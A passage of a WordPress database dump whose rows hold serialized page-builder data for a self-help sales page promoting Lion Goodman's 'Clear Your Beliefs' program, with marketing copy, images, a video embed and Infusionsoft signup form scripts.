Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1190, 1672, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:647:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -12px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1191, 1673, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:647:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -12px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 50px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n<div style="margin-left: -12px; margin-bottom: -18px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
